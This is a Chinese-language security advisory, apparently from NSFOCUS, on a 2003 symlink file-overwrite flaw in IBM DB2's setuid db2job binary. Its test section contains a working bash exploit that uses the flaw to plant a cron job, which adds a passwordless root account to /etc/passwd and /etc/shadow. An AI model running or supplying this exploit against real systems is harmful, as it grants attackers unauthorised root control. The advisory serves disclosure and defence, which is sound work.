首页 -> 安全研究

安全研究

安全漏洞
IBM DB2 db2job文件覆盖漏洞

发布日期:2003-08-05
更新日期:2003-08-11

受影响系统:
IBM DB2 Universal Database for Linux 7.2
IBM DB2 Universal Database for Linux 7.1
IBM DB2 Universal Database for Linux 7.0
IBM DB2 Universal Database for Linux 6.0
IBM DB2 Universal Database for AIX 7.2
IBM DB2 Universal Database for AIX 7.1
IBM DB2 Universal Database for AIX 7.0
IBM DB2 Universal Database for AIX 6.1
IBM DB2 Universal Database for AIX 6.0
IBM DB2 Universal Database for HP-UX 7.2
IBM DB2 Universal Database for HP-UX 7.1
IBM DB2 Universal Database for HP-UX 7.0
IBM DB2 Universal Database for HP-UX 6.1
IBM DB2 Universal Database for HP-UX 6.0
IBM DB2 Universal Database for Solaris 7.2
IBM DB2 Universal Database for Solaris 7.1
IBM DB2 Universal Database for Solaris 7.0
IBM DB2 Universal Database for Solaris 6.1
IBM DB2 Universal Database for Solaris 6.0
IBM DB2 Universal Database for Linux 6.1
    - Caldera Open Linux 2.4
    - RedHat Linux 7.0
    - SuSE Linux 7.0
    - Turbo Linux 6.0.4
描述:
BUGTRAQ  ID: 8344

IBM DB2是一款由IBM公司开发的强大的数据库系统,适合于多种操作系统下使用。

IBM DB2包含的db2job二进制程序存在写权限检查错误,本地攻击者可以利用这个漏洞通过此工具写ROOT属主的任意文件。

db2job以4550权限安装,默认安装属组为root.db2asgrp。db2job会以root用户权限写多个文件,文件以0770权限建立,并属组为root.db2asgrp。如果攻击者建立符号连接,连接到系统重要文件,就可以通过此工具往系统敏感文件中写信息,可造成权限提升。

必须注意的是db2job默认不允许全局执行,因此攻击者必须有一定的帐户才能利用这个漏洞提升权限。

<*来源:Juan Manuel Pascual Escriba (pask@hades2.concha.upv.es
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106010332721672&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Juan Manuel Pascual Escriba (pask@hades2.concha.upv.es)提供了如下测试方法:

#!/bin/bash

DB2JOB=/home/db2as/sqllib/adm/db2job
CRONFILE=/etc/cron.hourly/pakito
USER=pakito

unset DB2INSTANCE
export DB2DIR=./trash

if [ -d $DB2DIR ]; then
echo Trash directory already created
else
mkdir $DB2DIR
fi

cd $DB2DIR
if [ -f ./0_1.out ]; then
echo Link Already Created
else
ln -s $CRONFILE ./0_1.out
fi

$DB2JOB


echo "echo "#!/bin/bash"" > $CRONFILE
echo "echo "$USER:x:0:0::/:/bin/bash" >> /etc/passwd" >> $CRONFILE
echo "echo "$USER::12032:0:99999:7:::" >> /etc/shadow" >> $CRONFILE
echo " must wait until cron execute $CRONFILE and then exec su pakito"

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 暂时关闭db2job默认的setuid权限,不过会因此缺少部分功能。

厂商补丁:

IBM
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ers.ibm.com/

浏览次数:3492
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障